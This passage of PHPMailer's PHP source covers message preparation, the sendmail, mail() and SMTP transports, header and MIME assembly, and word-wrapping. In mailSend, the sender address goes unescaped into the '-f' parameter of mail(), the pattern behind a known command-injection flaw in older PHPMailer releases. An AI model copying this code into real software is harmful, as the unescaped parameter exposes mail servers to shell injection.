        // Verify we have required functions, CharSet, and at-sign.
        if ($this->idnSupported() and
            !empty($this->CharSet) and
            ($pos = strrpos($address, '@')) !== false) {
            $domain = substr($address, ++$pos);
            // Verify CharSet string is a valid one, and domain properly encoded in this CharSet.
            if ($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet)) {
                $domain = mb_convert_encoding($domain, 'UTF-8', $this->CharSet);
                if (($punycode = defined('INTL_IDNA_VARIANT_UTS46') ?
                    idn_to_ascii($domain, 0, INTL_IDNA_VARIANT_UTS46) :
                    idn_to_ascii($domain)) !== false) {
                    return substr($address, 0, $pos) . $punycode;
                }
            }
        }
        return $address;
    }

    /**
     * Create a message and send it.
     * Uses the sending method specified by $Mailer.
     * @throws phpmailerException
     * @return boolean false on error - See the ErrorInfo property for details of the error.
     */
    public function send()
    {
        try {
            if (!$this->preSend()) {
                return false;
            }
            return $this->postSend();
        } catch (phpmailerException $exc) {
            $this->mailHeader = '';
            $this->setError($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    /**
     * Prepare a message for sending.
     * @throws phpmailerException
     * @return boolean
     */
    public function preSend()
    {
        try {
            $this->error_count = 0; // Reset errors
            $this->mailHeader = '';

            // Dequeue recipient and Reply-To addresses with IDN
            foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) {
                $params[1] = $this->punyencodeAddress($params[1]);
                call_user_func_array(array($this, 'addAnAddress'), $params);
            }
            if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) {
                throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL);
            }

            // Validate From, Sender, and ConfirmReadingTo addresses
            foreach (array('From', 'Sender', 'ConfirmReadingTo') as $address_kind) {
                $this->$address_kind = trim($this->$address_kind);
                if (empty($this->$address_kind)) {
                    continue;
                }
                $this->$address_kind = $this->punyencodeAddress($this->$address_kind);
                if (!$this->validateAddress($this->$address_kind)) {
                    $error_message = $this->lang('invalid_address') . ' (punyEncode) ' . $this->$address_kind;
                    $this->setError($error_message);
                    $this->edebug($error_message);
                    if ($this->exceptions) {
                        throw new phpmailerException($error_message);
                    }
                    return false;
                }
            }

            // Set whether the message is multipart/alternative
            if ($this->alternativeExists()) {
                $this->ContentType = 'multipart/alternative';
            }

            $this->setMessageType();
            // Refuse to send an empty message unless we are specifically allowing it
            if (!$this->AllowEmpty and empty($this->Body)) {
                throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL);
            }

            // Create body before headers in case body makes changes to headers (e.g. altering transfer encoding)
            $this->MIMEHeader = '';
            $this->MIMEBody = $this->createBody();
            // createBody may have added some headers, so retain them
            $tempheaders = $this->MIMEHeader;
            $this->MIMEHeader = $this->createHeader();
            $this->MIMEHeader .= $tempheaders;

            // To capture the complete message when using mail(), create
            // an extra header list which createHeader() doesn't fold in
            if ($this->Mailer == 'mail') {
                if (count($this->to) > 0) {
                    $this->mailHeader .= $this->addrAppend('To', $this->to);
                } else {
                    $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;');
                }
                $this->mailHeader .= $this->headerLine(
                    'Subject',
                    $this->encodeHeader($this->secureHeader(trim($this->Subject)))
                );
            }

            // Sign with DKIM if enabled
            if (!empty($this->DKIM_domain)
                && !empty($this->DKIM_private)
                && !empty($this->DKIM_selector)
                && file_exists($this->DKIM_private)) {
                $header_dkim = $this->DKIM_Add(
                    $this->MIMEHeader . $this->mailHeader,
                    $this->encodeHeader($this->secureHeader($this->Subject)),
                    $this->MIMEBody
                );
                $this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF .
                    str_replace("\r\n", "\n", $header_dkim) . self::CRLF;
            }
            return true;
        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    /**
     * Actually send a message.
     * Send the email via the selected mechanism
     * @throws phpmailerException
     * @return boolean
     */
    public function postSend()
    {
        try {
            // Choose the mailer and send through it
            switch ($this->Mailer) {
                case 'sendmail':
                case 'qmail':
                    return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody);
                case 'smtp':
                    return $this->smtpSend($this->MIMEHeader, $this->MIMEBody);
                case 'mail':
                    return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
                default:
                    $sendMethod = $this->Mailer.'Send';
                    if (method_exists($this, $sendMethod)) {
                        return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody);
                    }

                    return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
            }
        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            $this->edebug($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
        }
        return false;
    }

    /**
     * Send mail using the $Sendmail program.
     * @param string $header The message headers
     * @param string $body The message body
     * @see PHPMailer::$Sendmail
     * @throws phpmailerException
     * @access protected
     * @return boolean
     */
    protected function sendmailSend($header, $body)
    {
        if ($this->Sender != '') {
            if ($this->Mailer == 'qmail') {
                $sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
            } else {
                $sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
            }
        } else {
            if ($this->Mailer == 'qmail') {
                $sendmail = sprintf('%s', escapeshellcmd($this->Sendmail));
            } else {
                $sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));
            }
        }
        if ($this->SingleTo) {
            foreach ($this->SingleToArray as $toAddr) {
                if (!@$mail = popen($sendmail, 'w')) {
                    throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
                }
                fputs($mail, 'To: ' . $toAddr . "\n");
                fputs($mail, $header);
                fputs($mail, $body);
                $result = pclose($mail);
                $this->doCallback(
                    ($result == 0),
                    array($toAddr),
                    $this->cc,
                    $this->bcc,
                    $this->Subject,
                    $body,
                    $this->From
                );
                if ($result != 0) {
                    throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
                }
            }
        } else {
            if (!@$mail = popen($sendmail, 'w')) {
                throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
            }
            fputs($mail, $header);
            fputs($mail, $body);
            $result = pclose($mail);
            $this->doCallback(
                ($result == 0),
                $this->to,
                $this->cc,
                $this->bcc,
                $this->Subject,
                $body,
                $this->From
            );
            if ($result != 0) {
                throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
            }
        }
        return true;
    }

    /**
     * Send mail using the PHP mail() function.
     * @param string $header The message headers
     * @param string $body The message body
     * @link http://www.php.net/manual/en/book.mail.php
     * @throws phpmailerException
     * @access protected
     * @return boolean
     */
    protected function mailSend($header, $body)
    {
        $toArr = array();
        foreach ($this->to as $toaddr) {
            $toArr[] = $this->addrFormat($toaddr);
        }
        $to = implode(', ', $toArr);

        if (empty($this->Sender)) {
            $params = ' ';
        } else {
            $params = sprintf('-f%s', $this->Sender);
        }
        if ($this->Sender != '' and !ini_get('safe_mode')) {
            $old_from = ini_get('sendmail_from');
            ini_set('sendmail_from', $this->Sender);
        }
        $result = false;
        if ($this->SingleTo && count($toArr) > 1) {
            foreach ($toArr as $toAddr) {
                $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
                $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
            }
        } else {
            $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
            $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
        }
        if (isset($old_from)) {
            ini_set('sendmail_from', $old_from);
        }
        if (!$result) {
            throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
        }
        return true;
    }

    /**
     * Get an instance to use for SMTP operations.
     * Override this function to load your own SMTP implementation
     * @return SMTP
     */
    public function getSMTPInstance()
    {
        if (!is_object($this->smtp)) {
            $this->smtp = new SMTP;
        }
        return $this->smtp;
    }

    /**
     * Send mail via SMTP.
     * Returns false if there is a bad MAIL FROM, RCPT, or DATA input.
     * Uses the PHPMailerSMTP class by default.
     * @see PHPMailer::getSMTPInstance() to use a different class.
     * @param string $header The message headers
     * @param string $body The message body
     * @throws phpmailerException
     * @uses SMTP
     * @access protected
     * @return boolean
     */
    protected function smtpSend($header, $body)
    {
        $bad_rcpt = array();
        if (!$this->smtpConnect($this->SMTPOptions)) {
            throw new phpmailerException($this->lang('smtp_connect_failed'), self::STOP_CRITICAL);
        }
        if ('' == $this->Sender) {
            $smtp_from = $this->From;
        } else {
            $smtp_from = $this->Sender;
        }
        if (!$this->smtp->mail($smtp_from)) {
            $this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError()));
            throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL);
        }

        // Attempt to send to all recipients
        foreach (array($this->to, $this->cc, $this->bcc) as $togroup) {
            foreach ($togroup as $to) {
                if (!$this->smtp->recipient($to[0])) {
                    $error = $this->smtp->getError();
                    $bad_rcpt[] = array('to' => $to[0], 'error' => $error['detail']);
                    $isSent = false;
                } else {
                    $isSent = true;
                }
                $this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From);
            }
        }

        // Only send the DATA command if we have viable recipients
        if ((count($this->all_recipients) > count($bad_rcpt)) and !$this->smtp->data($header . $body)) {
            throw new phpmailerException($this->lang('data_not_accepted'), self::STOP_CRITICAL);
        }
        if ($this->SMTPKeepAlive) {
            $this->smtp->reset();
        } else {
            $this->smtp->quit();
            $this->smtp->close();
        }
        //Create error message for any bad addresses
        if (count($bad_rcpt) > 0) {
            $errstr = '';
            foreach ($bad_rcpt as $bad) {
                $errstr .= $bad['to'] . ': ' . $bad['error'];
            }
            throw new phpmailerException(
                $this->lang('recipients_failed') . $errstr,
                self::STOP_CONTINUE
            );
        }
        return true;
    }

    /**
     * Initiate a connection to an SMTP server.
     * Returns false if the operation failed.
     * @param array $options An array of options compatible with stream_context_create()
     * @uses SMTP
     * @access public
     * @throws phpmailerException
     * @return boolean
     */
    public function smtpConnect($options = array())
    {
        if (is_null($this->smtp)) {
            $this->smtp = $this->getSMTPInstance();
        }

        // Already connected?
        if ($this->smtp->connected()) {
            return true;
        }

        $this->smtp->setTimeout($this->Timeout);
        $this->smtp->setDebugLevel($this->SMTPDebug);
        $this->smtp->setDebugOutput($this->Debugoutput);
        $this->smtp->setVerp($this->do_verp);
        $hosts = explode(';', $this->Host);
        $lastexception = null;

        foreach ($hosts as $hostentry) {
            $hostinfo = array();
            if (!preg_match('/^((ssl|tls):\/\/)*([a-zA-Z0-9\.-]*):?([0-9]*)$/', trim($hostentry), $hostinfo)) {
                // Not a valid host entry
                continue;
            }
            // $hostinfo[2]: optional ssl or tls prefix
            // $hostinfo[3]: the hostname
            // $hostinfo[4]: optional port number
            // The host string prefix can temporarily override the current setting for SMTPSecure
            // If it's not specified, the default value is used
            $prefix = '';
            $secure = $this->SMTPSecure;
            $tls = ($this->SMTPSecure == 'tls');
            if ('ssl' == $hostinfo[2] or ('' == $hostinfo[2] and 'ssl' == $this->SMTPSecure)) {
                $prefix = 'ssl://';
                $tls = false; // Can't have SSL and TLS at the same time
                $secure = 'ssl';
            } elseif ($hostinfo[2] == 'tls') {
                $tls = true;
                // tls doesn't use a prefix
                $secure = 'tls';
            }
            //Do we need the OpenSSL extension?
            $sslext = defined('OPENSSL_ALGO_SHA1');
            if ('tls' === $secure or 'ssl' === $secure) {
                //Check for an OpenSSL constant rather than using extension_loaded, which is sometimes disabled
                if (!$sslext) {
                    throw new phpmailerException($this->lang('extension_missing').'openssl', self::STOP_CRITICAL);
                }
            }
            $host = $hostinfo[3];
            $port = $this->Port;
            $tport = (integer)$hostinfo[4];
            if ($tport > 0 and $tport < 65536) {
                $port = $tport;
            }
            if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) {
                try {
                    if ($this->Helo) {
                        $hello = $this->Helo;
                    } else {
                        $hello = $this->serverHostname();
                    }
                    $this->smtp->hello($hello);
                    //Automatically enable TLS encryption if:
                    // * it's not disabled
                    // * we have openssl extension
                    // * we are not already using SSL
                    // * the server offers STARTTLS
                    if ($this->SMTPAutoTLS and $sslext and $secure != 'ssl' and $this->smtp->getServerExt('STARTTLS')) {
                        $tls = true;
                    }
                    if ($tls) {
                        if (!$this->smtp->startTLS()) {
                            throw new phpmailerException($this->lang('connect_host'));
                        }
                        // We must resend HELO after tls negotiation
                        $this->smtp->hello($hello);
                    }
                    if ($this->SMTPAuth) {
                        if (!$this->smtp->authenticate(
                            $this->Username,
                            $this->Password,
                            $this->AuthType,
                            $this->Realm,
                            $this->Workstation
                        )
                        ) {
                            throw new phpmailerException($this->lang('authenticate'));
                        }
                    }
                    return true;
                } catch (phpmailerException $exc) {
                    $lastexception = $exc;
                    $this->edebug($exc->getMessage());
                    // We must have connected, but then failed TLS or Auth, so close connection nicely
                    $this->smtp->quit();
                }
            }
        }
        // If we get here, all connection attempts have failed, so close connection hard
        $this->smtp->close();
        // As we've caught all exceptions, just report whatever the last one was
        if ($this->exceptions and !is_null($lastexception)) {
            throw $lastexception;
        }
        return false;
    }

    /**
     * Close the active SMTP session if one exists.
     * @return void
     */
    public function smtpClose()
    {
        if (is_a($this->smtp, 'SMTP')) {
            if ($this->smtp->connected()) {
                $this->smtp->quit();
                $this->smtp->close();
            }
        }
    }

    /**
     * Set the language for error messages.
     * Returns false if it cannot load the language file.
     * The default language is English.
     * @param string $langcode ISO 639-1 2-character language code (e.g. French is "fr")
     * @param string $lang_path Path to the language file directory, with trailing separator (slash)
     * @return boolean
     * @access public
     */
    public function setLanguage($langcode = 'en', $lang_path = '')
    {
        // Define full set of translatable strings in English
        $PHPMAILER_LANG = array(
            'authenticate' => 'SMTP Error: Could not authenticate.',
            'connect_host' => 'SMTP Error: Could not connect to SMTP host.',
            'data_not_accepted' => 'SMTP Error: data not accepted.',
            'empty_message' => 'Message body empty',
            'encoding' => 'Unknown encoding: ',
            'execute' => 'Could not execute: ',
            'file_access' => 'Could not access file: ',
            'file_open' => 'File Error: Could not open file: ',
            'from_failed' => 'The following From address failed: ',
            'instantiate' => 'Could not instantiate mail function.',
            'invalid_address' => 'Invalid address: ',
            'mailer_not_supported' => ' mailer is not supported.',
            'provide_address' => 'You must provide at least one recipient email address.',
            'recipients_failed' => 'SMTP Error: The following recipients failed: ',
            'signing' => 'Signing Error: ',
            'smtp_connect_failed' => 'SMTP connect() failed.',
            'smtp_error' => 'SMTP server error: ',
            'variable_set' => 'Cannot set or reset variable: ',
            'extension_missing' => 'Extension missing: '
        );
        if (empty($lang_path)) {
            // Calculate an absolute path so it can work if CWD is not here
            $lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;
        }
        $foundlang = true;
        $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';
        // There is no English translation file
        if ($langcode != 'en') {
            // Make sure language file path is readable
            if (!is_readable($lang_file)) {
                $foundlang = false;
            } else {
                // Overwrite language-specific strings.
                // This way we'll never have missing translation keys.
                $foundlang = include $lang_file;
            }
        }
        $this->language = $PHPMAILER_LANG;
        return (boolean)$foundlang; // Returns false if language not found
    }

    /**
     * Get the array of strings for the current language.
     * @return array
     */
    public function getTranslations()
    {
        return $this->language;
    }

    /**
     * Create recipient headers.
     * @access public
     * @param string $type
     * @param array $addr An array of recipient,
     * where each recipient is a 2-element indexed array with element 0 containing an address
     * and element 1 containing a name, like:
     * array(array('joe@example.com', 'Joe User'), array('zoe@example.com', 'Zoe User'))
     * @return string
     */
    public function addrAppend($type, $addr)
    {
        $addresses = array();
        foreach ($addr as $address) {
            $addresses[] = $this->addrFormat($address);
        }
        return $type . ': ' . implode(', ', $addresses) . $this->LE;
    }

    /**
     * Format an address for use in a message header.
     * @access public
     * @param array $addr A 2-element indexed array, element 0 containing an address, element 1 containing a name
     *      like array('joe@example.com', 'Joe User')
     * @return string
     */
    public function addrFormat($addr)
    {
        if (empty($addr[1])) { // No name provided
            return $this->secureHeader($addr[0]);
        } else {
            return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader(
                $addr[0]
            ) . '>';
        }
    }

    /**
     * Word-wrap message.
     * For use with mailers that do not automatically perform wrapping
     * and for quoted-printable encoded messages.
     * Original written by philippe.
     * @param string $message The message to wrap
     * @param integer $length The line length to wrap to
     * @param boolean $qp_mode Whether to run in Quoted-Printable mode
     * @access public
     * @return string
     */
    public function wrapText($message, $length, $qp_mode = false)
    {
        if ($qp_mode) {
            $soft_break = sprintf(' =%s', $this->LE);
        } else {
            $soft_break = $this->LE;
        }
        // If utf-8 encoding is used, we will need to make sure we don't
        // split multibyte characters when we wrap
        $is_utf8 = (strtolower($this->CharSet) == 'utf-8');
        $lelen = strlen($this->LE);
        $crlflen = strlen(self::CRLF);

        $message = $this->fixEOL($message);
        //Remove a trailing line break
        if (substr($message, -$lelen) == $this->LE) {
            $message = substr($message, 0, -$lelen);
        }

        //Split message into lines
        $lines = explode($this->LE, $message);
        //Message will be rebuilt in here
        $message = '';
        foreach ($lines as $line) {
            $words = explode(' ', $line);
            $buf = '';
            $firstword = true;
            foreach ($words as $word) {
                if ($qp_mode and (strlen($word) > $length)) {
                    $space_left = $length - strlen($buf) - $crlflen;
                    if (!$firstword) {
                        if ($space_left > 20) {
                            $len = $space_left;
                            if ($is_utf8) {
                                $len = $this->utf8CharBoundary($word, $len);
                            } elseif (substr($word, $len - 1, 1) == '=') {
                                $len--;
                            } elseif (substr($word, $len - 2, 1) == '=') {
                                $len -= 2;
                            }
                            $part = substr($word, 0, $len);
                            $word = substr($word, $len);
                            $buf .= ' ' . $part;
                            $message .= $buf . sprintf('=%s', self::CRLF);
                        } else {
                            $message .= $buf . $soft_break;
                        }
                        $buf = '';
                    }
                    while (strlen($word) > 0) {
                        if ($length <= 0) {
                            break;
                        }
                        $len = $length;
                        if ($is_utf8) {
                            $len = $this->utf8CharBoundary($word, $len);
                        } elseif (substr($word, $len - 1, 1) == '=') {
                            $len--;
                        } elseif (substr($word, $len - 2, 1) == '=') {
                            $len -= 2;
                        }
                        $part = substr($word, 0, $len);
                        $word = substr($word, $len);

                        if (strlen($word) > 0) {
                            $message .= $part . sprintf('=%s', self::CRLF);
                        } else {
                            $buf = $part;
                        }
                    }
                } else {
                    $buf_o = $buf;
                    if (!$firstword) {
                        $buf .= ' ';
                    }
                    $buf .= $word;

                    if (strlen($buf) > $length and $buf_o != '') {
                        $message .= $buf_o . $soft_break;
                        $buf = $word;
                    }
                }
                $firstword = false;
            }
            $message .= $buf . self::CRLF;
        }

        return $message;
    }

    /**
     * Find the last character boundary prior to $maxLength in a utf-8
     * quoted-printable encoded string.
     * Original written by Colin Brown.
     * @access public
     * @param string $encodedText utf-8 QP text
     * @param integer $maxLength Find the last character boundary prior to this length
     * @return integer
     */
    public function utf8CharBoundary($encodedText, $maxLength)
    {
        $foundSplitPos = false;
        $lookBack = 3;
        while (!$foundSplitPos) {
            $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
            $encodedCharPos = strpos($lastChunk, '=');
            if (false !== $encodedCharPos) {
                // Found start of encoded character byte within $lookBack block.
                // Check the encoded byte value (the 2 chars after the '=')
                $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
                $dec = hexdec($hex);
                if ($dec < 128) {
                    // Single byte character.
                    // If the encoded char was found at pos 0, it will fit
                    // otherwise reduce maxLength to start of the encoded char
                    if ($encodedCharPos > 0) {
                        $maxLength = $maxLength - ($lookBack - $encodedCharPos);
                    }
                    $foundSplitPos = true;
                } elseif ($dec >= 192) {
                    // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength = $maxLength - ($lookBack - $encodedCharPos);
                    $foundSplitPos = true;
                } elseif ($dec < 192) {
                    // Middle byte of a multi byte character, look further back
                    $lookBack += 3;
                }
            } else {
                // No encoded character found
                $foundSplitPos = true;
            }
        }
        return $maxLength;
    }

    /**
     * Apply word wrapping to the message body.
     * Wraps the message body to the number of chars set in the WordWrap property.
     * You should only do this to plain-text bodies as wrapping HTML tags may break them.
     * This is called automatically by createBody(), so you don't need to call it yourself.
     * @access public
     * @return void
     */
    public function setWordWrap()
    {
        if ($this->WordWrap < 1) {
            return;
        }

        switch ($this->message_type) {
            case 'alt':
            case 'alt_inline':
            case 'alt_attach':
            case 'alt_inline_attach':
                $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap);
                break;
            default:
                $this->Body = $this->wrapText($this->Body, $this->WordWrap);
                break;
        }
    }

    /**
     * Assemble message headers.
     * @access public
     * @return string The assembled headers
     */
    public function createHeader()
    {
        $result = '';

        if ($this->MessageDate == '') {
            $this->MessageDate = self::rfcDate();
        }
        $result .= $this->headerLine('Date', $this->MessageDate);

        // To be created automatically by mail()
        if ($this->SingleTo) {
            if ($this->Mailer != 'mail') {
                foreach ($this->to as $toaddr) {
                    $this->SingleToArray[] = $this->addrFormat($toaddr);
                }
            }
        } else {
            if (count($this->to) > 0) {
                if ($this->Mailer != 'mail') {
                    $result .= $this->addrAppend('To', $this->to);
                }
            } elseif (count($this->cc) == 0) {
                $result .= $this->headerLine('To', 'undisclosed-recipients:;');
            }
        }

        $result .= $this->addrAppend('From', array(array(trim($this->From), $this->FromName)));

        // sendmail and mail() extract Cc from the header before sending
        if (count($this->cc) > 0) {
            $result .= $this->addrAppend('Cc', $this->cc);
        }

        // sendmail and mail() extract Bcc from the header before sending
        if ((
                $this->Mailer == 'sendmail' or $this->Mailer == 'qmail' or $this->Mailer == 'mail'
            )
            and count($this->bcc) > 0
        ) {
            $result .= $this->addrAppend('Bcc', $this->bcc);
        }

        if (count($this->ReplyTo) > 0) {
            $result .= $this->addrAppend('Reply-To', $this->ReplyTo);
        }

        // mail() sets the subject itself
        if ($this->Mailer != 'mail') {
            $result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject)));
        }

        if ('' != $this->MessageID and preg_match('/^<.*@.*>$/', $this->MessageID)) {
            $this->lastMessageID = $this->MessageID;
        } else {
            $this->lastMessageID = sprintf('<%s@%s>', $this->uniqueid, $this->serverHostname());
        }
        $result .= $this->headerLine('Message-ID', $this->lastMessageID);
        if (!is_null($this->Priority)) {
            $result .= $this->headerLine('X-Priority', $this->Priority);
        }
        if ($this->XMailer == '') {
            $result .= $this->headerLine(
                'X-Mailer',
                'PHPMailer ' . $this->Version . ' (https://github.com/PHPMailer/PHPMailer)'
            );
        } else {
            $myXmailer = trim($this->XMailer);
            if ($myXmailer) {
                $result .= $this->headerLine('X-Mailer', $myXmailer);
            }
        }

        if ($this->ConfirmReadingTo != '') {
            $result .= $this->headerLine('Disposition-Notification-To', '<' . $this->ConfirmReadingTo . '>');
        }

        // Add custom headers
        foreach ($this->CustomHeader as $header) {
            $result .= $this->headerLine(
                trim($header[0]),
                $this->encodeHeader(trim($header[1]))
            );
        }
        if (!$this->sign_key_file) {
            $result .= $this->headerLine('MIME-Version', '1.0');
            $result .= $this->getMailMIME();
        }

        return $result;
    }

    /**
     * Get the message MIME type headers.
     * @access public
     * @return string
     */
    public function getMailMIME()
    {
        $result = '';
        $ismultipart = true;
        switch ($this->message_type) {
            case 'inline':
                $result .= $this->headerLine('Content-Type', 'multipart/related;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            case 'attach':
            case 'inline_attach':
            case 'alt_attach':
            case 'alt_inline_attach':
                $result .= $this->headerLine('Content-Type', 'multipart/mixed;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            case 'alt':
            case 'alt_inline':
                $result .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            default:
                // Catches case 'plain': and case '':
                $result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet);
                $ismultipart = false;
                break;
        }
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($this->Encoding != '7bit') {
            // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE
            if ($ismultipart) {
                if ($this->Encoding == '8bit') {
                    $result .= $this->headerLine('Content-Transfer-Encoding', '8bit');
                }
                // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible
            } else {
                $result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding);
            }
        }

        if ($this->Mailer != 'mail') {
            $result .= $this->LE;
        }

        return $result;
    }

    /**
     * Returns the whole MIME message.
     * Includes complete headers and body.
     * Only valid post preSend().
     * @see PHPMailer::preSend()
     * @access public
     * @return string
     */
    public function getSentMIMEMessage()
    {
        return rtrim($this->MIMEHeader . $this->mailHeader, "\n\r") . self::CRLF . self::CRLF . $this->MIMEBody;
    }

    /**
     * Assemble the message body.
     * Returns an empty string on failure.
     * @access public
     * @throws phpmailerException
     * @return string The assembled message body
     */
    public function createBody()
    {
        $body = '';
        //Create unique IDs and preset boundaries
        $this->uniqueid = md5(uniqid(time()));
        $this->boundary[1] = 'b1_' . $this->uniqueid;
        $this->boundary[2] = 'b2_' . $this->uniqueid;
        $this->boundary[3] = 'b3_' . $this->uniqueid;

        if ($this->sign_key_file) {
            $body .= $this->getMailMIME() . $this->LE;
        }

        $this->setWordWrap();

        $bodyEncoding = $this->Encoding;
        $bodyCharSet = $this->CharSet;
        //Can we do a 7-bit downgrade?
        if ($bodyEncoding == '8bit' and !$this->has8bitChars($this->Body)) {
            $bodyEncoding = '7bit';
            $bodyCharSet = 'us-ascii';
        }
        //If lines are too long, and we're not already using an encoding that will shorten them,
        //change to quoted-printable transfer encoding
        if ('base64' != $this->Encoding and self::hasLineLongerThanMax($this->Body)) {
            $this->Encoding = 'quoted-printable';
            $bodyEncoding = 'quoted-printable';
        }

        $altBodyEncoding = $this->Encoding;
        $altBodyCharSet = $this->CharSet;
        //Can we do a 7-bit downgrade?
        if ($altBodyEncoding == '8bit' and !$this->has8bitChars($this->AltBody)) {
            $altBodyEncoding = '7bit';
            $altBodyCharSet = 'us-ascii';
        }
        //If lines are too long, and we're not already using an encoding that will shorten them,
        //change to quoted-printable transfer encoding
        if ('base64' != $altBodyEncoding and self::hasLineLongerThanMax($this->AltBody)) {
            $altBodyEncoding = 'quoted-printable';
        }
        //Use this as a preamble in all multipart message types
        $mimepre = "This is a multi-part message in MIME format." . $this->LE . $this->LE;
        switch ($this->message_type) {
            case 'inline':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[1]);
                break;
            case 'attach':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'inline_attach':
                $body .= $mimepre;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'alt':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                if (!empty($this->Ical)) {
                    $body .= $this->getBoundary($this->boundary[1], '', 'text/calendar; method=REQUEST', '');
                    $body .= $this->encodeString($this->Ical, $this->Encoding);
                    $body .= $this->LE . $this->LE;
                }
                $body .= $this->endBoundary($this->boundary[1]);
                break;
            case 'alt_inline':
                $body .= $mimepre;
                $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->endBoundary($this->boundary[1]);
                break;
            case 'alt_attach':
                $body .= $mimepre;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->endBoundary($this->boundary[2]);
